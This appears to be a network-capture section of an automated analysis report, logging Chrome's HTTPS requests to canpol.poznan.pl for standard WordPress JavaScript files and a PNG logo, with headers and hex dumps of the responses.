                                                            Content-Length: 6406
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:59 UTC6406INData Raw: 76 61 72 20 72 75 6e 74 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 2c 74 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 68 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 6e 3d 72 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 65 3d 72 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 7c 7c 22 40 40 61 73 79 6e 63 49 74 65 72 61 74 6f 72 22 2c 6f 3d 72 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                            Data Ascii: var runtime=function(a){"use strict";var u,t=Object.prototype,h=t.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},n=r.iterator||"@@iterator",e=r.asyncIterator||"@@asyncIterator",o=r.toStringTag||"@@toStringTag";function i(t,r,e){return Object.defineP


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.1649747178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC601OUTGET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:28 GMT
                                                            ETag: "4056-620a932780dd7"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16470
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:59 UTC7906INData Raw: 2f 2a 2a 0a 20 2a 20 63 6f 72 65 2d 6a 73 20 33 2e 31 31 2e 30 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 7a 6c 6f 69 72 6f 63 6b 2f 63 6f 72 65 2d 6a 73 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 3a 2f 2f 72 6f 63 6b 2e 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 6f 72 67 0a 20 2a 20 c2 a9 20 32 30 32 31 20 44 65 6e 69 73 20 50 75 73 68 6b 61 72 65 76 20 28 7a 6c 6f 69 72 6f 63 6b 2e 72 75 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 53 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 2c 65 2c 6f 3b 65 3d 7b 7d 2c 28 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 5b 74 5d 29 72 65 74 75 72 6e 20 65 5b 74 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6e 3d 65 5b 74 5d 3d 7b 69 3a 74 2c 6c 3a 21 31 2c 65 78 70 6f
                                                            Data Ascii: /** * core-js 3.11.0 * https://github.com/zloirock/core-js * License: http://rock.mit-license.org * 2021 Denis Pushkarev (zloirock.ru) */!function(S){"use strict";var r,e,o;e={},(o=function(t){if(e[t])return e[t].exports;var n=e[t]={i:t,l:!1,expo
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 63 3d 72 2e 64 61 74 61 3d 7b 7d 2c 75 3d 72 2e 4e 41 54 49 56 45 3d 22 4e 22 2c 66 3d 72 2e 50 4f 4c 59 46 49 4c 4c 3d 22 50 22 3b 74 2e 65 78 70 6f 72 74 73 3d 72 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 31 35 29 2c 6f 3d 72 28 31 36 29 2c 69 3d 72 28 32 38 29 2c 72 3d 72 28 34 37 29 2c 63 3d 69 28 22 49 45 5f 50 52 4f 54 4f 22 29 2c 75 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 3b 74 2e 65 78 70 6f 72 74 73 3d 72 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6f 28 74 29 2c 65 28 74 2c 63 29 3f 74 5b 63 5d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 63 6f 6e
                                                            Data Ascii: toLowerCase()},c=r.data={},u=r.NATIVE="N",f=r.POLYFILL="P";t.exports=r},function(t,n,r){var e=r(15),o=r(16),i=r(28),r=r(47),c=i("IE_PROTO"),u=Object.prototype;t.exports=r?Object.getPrototypeOf:function(t){return t=o(t),e(t,c)?t[c]:"function"==typeof t.con
                                                            2025-01-15 10:07:59 UTC564INData Raw: 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 2c 6f 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 31 26 74 26 26 28 6e 3d 6f 28 6e 29 29 2c 38 26 74 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 34 26 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 26 26 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 6e 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 69 66 28 6f 2e 72 28 72 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c
                                                            Data Ascii: ngTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},o.t=function(n,t){if(1&t&&(n=o(n)),8&t)return n;if(4&t&&"object"==typeof n&&n&&n.__esModule)return n;var r=Object.create(null);if(o.r(r),Object.defineProperty(r,"default",{enumerabl


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.1649748178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC618OUTGET /wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:58 GMT
                                                            ETag: "4e9-620a930ad81a8"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1257
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:59 UTC1257INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 64 6f 6d 52 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.domReady=function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=funct


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.1649751178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC405OUTGET /wp-content/uploads/2016/04/logo_new2.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC258INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:01 GMT
                                                            ETag: "1206e-620a8e5c3410b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 73838
                                                            Content-Type: image/png
                                                            2025-01-15 10:07:59 UTC7934INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b0 00 00 00 f0 08 06 00 00 01 16 66 01 64 00 00 00 09 70 48 59 73 00 00 0e 26 00 00 0e 26 01 a2 ef 25 fc 00 00 20 00 49 44 41 54 78 9c ec 5d 07 78 54 45 d7 be db 7b 3a 81 84 96 d0 91 ae 80 0a 22 fc 96 0f 1b 48 51 10 41 c4 82 88 20 4d a9 7e 82 22 82 52 45 a9 22 e2 07 28 82 a0 14 0b 58 90 2e 08 d2 41 3a 81 14 12 d2 b3 bd ff e7 bd f7 4e 72 b3 d9 14 42 68 ca 79 9e cd 6e 6e 9d 99 33 a7 9f 39 a3 f4 fb fd dc 3f 11 94 37 ba 01 d7 0a ae ba 63 84 71 b9 4c 2e f7 7a 5c 2e 35 27 93 f9 95 4a a5 a7 22 1a 76 b5 70 d5 1d 73 3a 1c 1a 2d 7d 67 e7 e4 84 a9 54 2a b7 d1 68 b4 dc 0c 9d bb f2 8e f9 fd 32 4e 2e f7 79 1d 0e 83 cd 6e 57 9b c2 c3 b3 71 b8 52 74 f4 e5 c3 87 0e 35 ab 54 a9 52 7a 4c 6c 6c 8a dd 66 d3 a3 a3 37 aa
                                                            Data Ascii: PNGIHDRfdpHYs&&% IDATx]xTE{:"HQA M~"RE"(X.A:NrBhynn39?7cqL.z\.5'J"vps:-}gT*h2N.ynWqRt5TRzLllf7
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 09 a5 07 0a 0b 1f 61 a7 fe e1 7d 90 41 38 0e d7 19 d8 1b c6 84 29 24 f8 c6 33 a8 0f 2e 4c 4c 31 43 cc 2e ae 7c f1 88 89 e7 e5 f0 d6 97 01 80 3c a4 f5 23 51 9d 5e 2a b5 f6 f2 ad 76 9f cb 25 f7 bb dc 72 16 33 90 c9 f9 0c 7a 85 45 5c f2 c6 40 91 9b ab d6 c0 f8 25 db 04 ac 0d b6 49 54 64 64 a6 d1 24 d4 80 06 65 71 7c 3e b8 5c 74 b4 ca f2 1d b3 52 41 2f f0 7e a1 84 10 fe f7 fb 95 2e 20 d0 e3 31 a0 3a b1 42 28 4e 28 68 69 85 a3 d3 42 32 bc f0 2e 9f 82 fd 96 09 d9 f0 32 c9 ff 7c 37 38 21 15 42 74 3a 0b 4a 82 a0 61 72 72 76 8e b1 3e a6 55 8a f2 d9 27 be d3 2b d4 60 e2 1d d0 62 42 3d 57 e2 f2 f6 ab 45 98 8f 93 24 df cb 02 12 d0 d9 ff c4 43 a0 69 16 3a e7 75 b9 35 2a 62 71 d2 63 8a 7d fb a2 a1 2e 71 bc a7 42 e9 57 93 8a 8d 65 7b 7a bd ce 76 2b 46 87 af 05 dc b8 cc
                                                            Data Ascii: a}A8)$3.LL1C.|<#Q^*v%r3zE\@%ITdd$eq|>\tRA/~. 1:B(N(hiB2.2|78!Bt:Jarrv>U'+`bB=WE$Ci:u5*bqc}.qBWe{zv+F
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 56 a7 4e fd 2b f0 d5 dc df 49 49 97 89 b8 5c 52 c2 82 5b 9e 11 58 cb ba 75 ab 36 15 97 bf 5c 0d 28 1e 78 60 64 5d 8e 1b 59 e2 45 7a bd 3b 29 31 b1 3a 4f d4 36 9b be 40 aa 29 7c ac e2 19 aa ab c9 15 05 2a ab 58 f7 e9 36 91 5d 63 b8 7a 02 83 fa 87 38 0f 26 b7 cf 77 54 d1 a2 c5 25 ee c0 81 98 0a 68 5b d9 20 27 47 73 5f bb 76 db 6d 53 a7 fe f2 5b 83 06 9f 08 4d 12 08 0d df ad e3 e2 ea d7 6a d7 ae 42 89 0b b0 74 d9 b2 e7 50 c9 9b 65 69 b0 4d 05 aa 56 a9 a2 e9 de b3 e7 75 db d6 64 df de bd ad f8 ad 8f c9 f6 64 9b ef c0 fd 2f 7c fb 84 e4 64 48 3e a8 8b f2 82 8d 80 ae 57 fb fe ed 50 21 2a a2 e8 b4 40 04 55 e1 de b5 ab 99 76 e4 c8 b5 dc 9c 39 6d 4a bf b9 e2 40 3f 6a d4 c3 9d 38 ee e1 eb f9 ce f9 0b 16 bc 7a c5 37 69 34 de 9c 59 b3 7e 3a 58 bf fe f7 89 c9 c9 36 30
                                                            Data Ascii: VN+II\R[Xu6\(x`d]YEz;)1:O6@)|*X6]cz8&wT%h[ 'Gs_vmS[MjBtPeiMVudd/|dH>WP!*@Uv9mJ@?j8z7i4Y~:X60
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 8a 58 00 b1 a1 f8 ac 28 0a 56 54 aa a2 f8 ac a0 62 41 44 11 14 44 01 45 45 45 11 a4 89 4a 91 1e 42 08 e9 21 ed fa ed be f9 66 76 f6 e6 36 77 97 4a 42 c8 fe 7f 2c 77 d9 db 9d 9d dd 9d 6f be 32 5f 51 bd 21 9c 4e dc 98 88 14 b7 1b 9e ba 82 a7 49 85 8a 72 26 18 38 7e 41 0d bd 27 9e 07 98 10 dc a4 32 49 84 ce 36 69 52 02 9c 0a a9 3e 6d 44 87 c3 2f 03 2c 79 0e 87 dd 49 fd e6 1c 2e 2c c2 79 a9 df 9c a4 0d 04 b5 8f 92 9a 61 57 a0 6b ba 82 fa 72 a9 ff 9b 7a ff 21 79 f8 42 c5 51 81 11 a1 e6 45 40 ea 7c a9 e7 6a fd 54 07 16 1e e8 22 73 e9 81 49 8a 11 14 10 3a f3 b6 47 24 4f 3d e1 3a 5a d6 5a d6 86 da b7 00 ef b5 a0 28 c1 bc f7 ea 62 2e cb f9 21 51 e2 a3 44 c1 e5 af d0 74 3f 85 cb f3 11 5c 24 a6 6d b0 a1 c0 da 0b 12 23 73 56 0e e6 89 0f 12 98 2c b1 45 72 7a ae e6 c5
                                                            Data Ascii: X(VTbADDEEEJB!fv6wJB,wo2_Q!NIr&8~A'2I6iR>mD/,yI.,yaWkrz!yBQE@|jT"sI:G$O=:ZZ(b.!QDt?\$m#sV,Erz
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 0f 26 22 46 21 30 13 23 30 26 26 46 3a 16 10 6d 00 3f fd f4 d3 37 dd 7a eb ad ff a8 3a 2a 89 6b 64 1c 36 dc f1 03 07 0e dc 81 fb 6d c9 cc cc 0c 7b ad 5b 6e b9 e5 ba 45 8b 3e 5a c5 a2 06 78 02 db b9 73 67 52 f8 fe f9 cb 24 b0 53 41 64 55 cd c9 a1 a8 99 7d 65 28 55 84 39 19 fc 05 d3 a6 a8 f8 7c 82 15 6f f0 89 ef 0e 33 7b 3f 59 9c 16 b0 fe 85 39 19 c4 75 58 40 67 c3 7a 18 c4 da f8 c9 03 52 59 35 7c 6f dc a8 91 bd ed 84 09 a7 2d 71 01 1c 7b f6 c4 a3 ab ae 0a d9 87 89 22 e0 76 bb 23 ea 2a cf 3c f3 cc e0 99 33 67 ae e4 45 44 3e af 3d 23 36 b6 01 c1 31 91 12 06 80 d3 e9 2a 09 d7 2e 98 ee 97 2e 5d 3a f3 3f ff f9 cf b3 8c 73 c5 c6 c6 0e c3 d7 ea 1f a9 2f d1 38 18 1b b0 d0 1f b8 2e bb 7e a4 b6 a2 71 cb cd 9b 37 37 7e e0 81 07 1a e4 e7 e7 17 21 55 fa 81 63 17 2e 5c
                                                            Data Ascii: &"F!0#0&&F:m?7z:*kd6m{[nE>ZxsgR$SAdU}e(U9|o3{?Y9uX@gzRY5|o-q{"v#*<3gED>=#61*..]:?s/8.~q77~!Uc.\
                                                            2025-01-15 10:08:00 UTC8000INData Raw: 5f 5c 98 9b 9b bf 19 b2 43 81 91 65 d7 ae 5d 8f bc f5 d6 5b 37 60 2e fb 25 0c a7 8c 8c 2c cf c6 8d 9b 2f d9 bf 7f ef 5d b8 bf 3d ef b8 e3 8e 1f 24 c9 bc d2 e7 f3 5c d3 bc 79 f3 23 d9 d9 b9 62 5e 5e c1 e6 07 1e 78 60 cb a8 51 a3 7e 82 c8 1a d0 31 83 61 2e 48 d8 bf 7f ff 95 eb d7 af bf ad 67 cf de 2f eb 6c 83 40 80 e0 d7 09 ba 36 c2 63 07 d2 20 90 ad 52 f2 21 3a 75 04 c6 40 4d f7 aa 59 56 15 b7 64 20 2c cc c5 90 80 65 f3 8c eb af 7f 3c 90 9b 6b 8d 4b 48 b0 02 71 59 b0 58 e9 c5 5c c9 db a4 09 21 26 cc e2 c1 74 46 39 97 db 4d fe f6 63 3d 34 40 0d 2b e8 40 76 76 51 42 7c bc 10 90 15 b2 c6 8d e5 11 24 88 34 3c 9d e4 54 c0 93 98 19 2b cd 84 13 88 82 1f 41 0a 68 3c 00 03 90 2c 25 10 b9 e2 2b 7e d0 1e 66 da 0f 1a 48 48 be 3e cd 53 3d 18 ca 41 89 9b 66 e4 f5 9b 7f
                                                            Data Ascii: _\Ce][7`.%,/]=$\y#b^^x`Q~1a.Hg/l@6c R!:u@MYVd ,e<kKHqYX\!&tF9Mc=4@+@vvQB|$4<T+Ah<,%+~fHH>S=Af
                                                            2025-01-15 10:08:00 UTC8000INData Raw: ac f8 9f 2d 5b fe 1b 77 e7 9d bd 6b fb 1e aa 1b fe e5 cb 17 ee e9 d4 e9 55 fc 32 65 93 d7 6b e1 99 7a e9 f8 37 11 7f 57 64 de 53 51 63 72 88 d0 11 71 06 11 a5 e0 ef 24 d8 5a 44 5a ac 99 61 46 34 70 26 a1 b6 4d 88 74 82 06 a7 0b f0 fe 0a 06 0f 03 25 8a be c4 c4 f5 e6 f5 eb 67 a2 a1 43 1f af cd 6e d6 14 ac cf 3d 37 64 04 42 43 bc b7 de fa f7 9e 89 13 e7 a5 1c 3f 9e cf 7e d3 07 3f c3 76 7e 72 f2 c0 56 a3 46 dd 8d f2 f3 ad b5 d9 ef 8a a0 e3 87 1f b6 7d 57 92 6e 5b 3f 67 ce cf 2b 52 52 76 f1 8c 4a cf b8 2e 6c df be 4b cf 27 9e 18 6d da b5 ab 61 6d f7 bb ba e1 7f ea a9 9f fe bc fa ea 27 b0 60 e2 97 7c 3e b3 24 99 02 c1 14 57 40 06 01 04 f9 87 41 b3 82 7d b0 61 32 d1 2a 4c f3 09 8a 25 95 a1 41 bb 1a d3 12 82 eb 60 b5 7c ab 06 0c 9c 32 d4 be 06 06 84 e7 f7 53 0f
                                                            Data Ascii: -[wkU2ekz7WdSQcrq$ZDZaF4p&Mt%gCn=7dBC?~?v~rVF}Wn[?g+RRvJ.lK'mam'`|>$W@A}a2*L%A`|2S
                                                            2025-01-15 10:08:00 UTC8000INData Raw: 1f 48 78 0d 52 ee 5c 90 58 ef cf cf cf df ab 75 61 c8 60 ba 76 ed 7a 06 30 a6 e7 73 73 73 77 46 7a 0f 5a 27 d1 e9 39 4c ed d6 ec 7f bb d7 a4 08 60 56 67 0b 95 1c f4 7d ea 94 00 cc 5f bb f7 de 7b 47 3d f1 c4 13 27 9c 79 e6 99 4f 41 79 52 f6 be 12 9b 46 27 9e 78 62 ae df df 60 78 95 31 67 99 c2 cf 3e fb 6c b7 26 c9 be 7d fb 96 d6 d7 fb 1b e8 66 9c 74 43 4e 53 0b d5 19 80 91 31 0a 4d 8b 7e 56 21 f7 80 01 03 72 df 79 e7 9d dd 86 04 83 fa d8 81 69 62 5d 89 6d bf 77 a5 dd 33 c2 05 f0 73 e7 ce 7d 1a 84 a7 3c ce c0 f1 cc fb 26 3d 24 9d 2f 60 97 e5 b0 0e da f2 97 b3 67 cf fe 71 e1 c2 85 d7 7e f0 c1 07 7b 1d 41 a6 31 42 c0 f9 cf 7f fe b3 a0 ba ba e6 ab 9d 3b f3 10 a8 48 47 54 c8 be 76 d4 8f 06 f3 76 c6 19 67 14 81 36 da 61 77 e9 f5 eb d7 af 10 d7 f5 61 59 f8 99 87
                                                            Data Ascii: HxR\Xua`vz0ssswFzZ'9L`Vg}_{G='yOAyRF'xb`x1g>l&}ftCNS1M~V!ryib]mw3s}<&=$/`gq~{A1B;HGTvvg6awaY
                                                            2025-01-15 10:08:00 UTC8000INData Raw: f8 dc 8b 2f be f8 c1 b9 e7 9e 77 3f 80 22 d1 3a 86 0e bd 68 62 71 71 71 06 00 d6 d9 e2 73 20 00 9c d6 af df 59 5f 24 26 fa fa 3a 81 57 61 61 e1 f0 9a 9a fa 95 2e 97 0c da 8f 5f 3f e6 98 5e 2b d6 ae 5d ff dc a4 49 0f bf 37 67 ce 9c e3 c5 67 b1 0e 40 20 48 60 d7 11 6d 9a 9a 9a 1a 04 90 eb 07 79 2a 63 da b0 9c 9f 5f 88 17 3e 2c 6b 61 21 b6 95 f4 35 68 d7 38 35 62 01 b0 23 8e 38 a2 b4 65 cb ac b7 51 d1 05 81 04 1d 89 3c d8 8f c3 e1 90 65 49 07 07 24 61 b3 52 ce af 35 6a 42 a4 7b aa 61 ac 09 ba be 90 58 ce 22 56 48 ed 0f 3a d0 00 86 64 07 31 5e 41 e4 90 a1 d2 58 af d3 f5 c4 44 dc 8f 81 ee 2f 40 37 cf a1 0c 24 31 31 ec ca c8 40 9b 83 5b 2d 2d 75 ab 09 09 6e 57 5d 9d ea 49 4c 74 e3 7a 0e 9c e7 f2 c1 81 67 04 b1 60 42 82 27 58 53 e3 09 ea 3a 3d 60 30 a2 46 96 90
                                                            Data Ascii: /w?":hbqqqs Y_$&:Waa._?^+]I7gg@ H`my*c_>,ka!5h85b#8eQ<eI$aR5jB{aX"VH:d1^AXD/@7$11@[--unW]ILtzg`B'XS:=`0F
                                                            2025-01-15 10:08:00 UTC1904INData Raw: b4 82 2b ff 1e fe 15 40 c5 21 1f 62 fe ad 42 96 13 58 f1 b6 e5 cf da 04 2f cb 06 a9 d6 7a 30 eb 88 a7 2f 16 d3 e1 de 7e a3 bf 23 80 91 de 2c 99 36 5a 59 b8 cf 49 c4 2e 49 78 26 82 e4 dd 8c 22 bb c4 18 2d 19 82 83 dc c1 c3 e7 23 e6 43 0c 2a 6b e9 05 78 4f 88 9e 61 a0 b0 db 65 80 97 90 31 74 66 42 cd 0b dd d5 5c 12 59 7b aa a3 9d 8f 38 08 64 b6 c9 f4 4a b9 b9 69 52 13 49 ae af 27 1a 18 ad 40 fe d9 28 26 39 89 6a 64 1c d0 c4 c3 cd a2 bb 7b ec 20 e6 32 1d 1f 48 19 23 cc 32 d1 aa d3 ba fa df 0e 28 22 23 6f b4 7c 82 24 6b 7f d6 aa f9 39 bd eb 9c b6 c0 74 f9 95 23 f3 37 9f 31 19 22 9d 7f d5 65 3b 33 b7 99 d6 14 f3 fd c8 fe 26 32 35 93 41 19 bf 36 5a 16 1b a0 71 bb a1 23 48 da ee 3b 00 ae f5 63 3c 29 5b 1d 44 58 3b 22 bf e7 98 e5 a8 65 61 39 73 7c c6 4c 57 04 71
                                                            Data Ascii: +@!bBX/z0/~#,6ZYI.Ix&"-#C*kxOae1tfB\Y{8dJiRI'@(&9jd{ 2H#2("#o|$k9t#71"e;3&25A6Zq#H;c<)[DX;"ea9s|LWq


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.1649750178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC614OUTGET /wp-includes/js/dist/hooks.min.js?ver=a7edae857aab69d69fa10d5aef23a5de HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:55 GMT
                                                            ETag: "1540-620a93080e405"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 5440
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
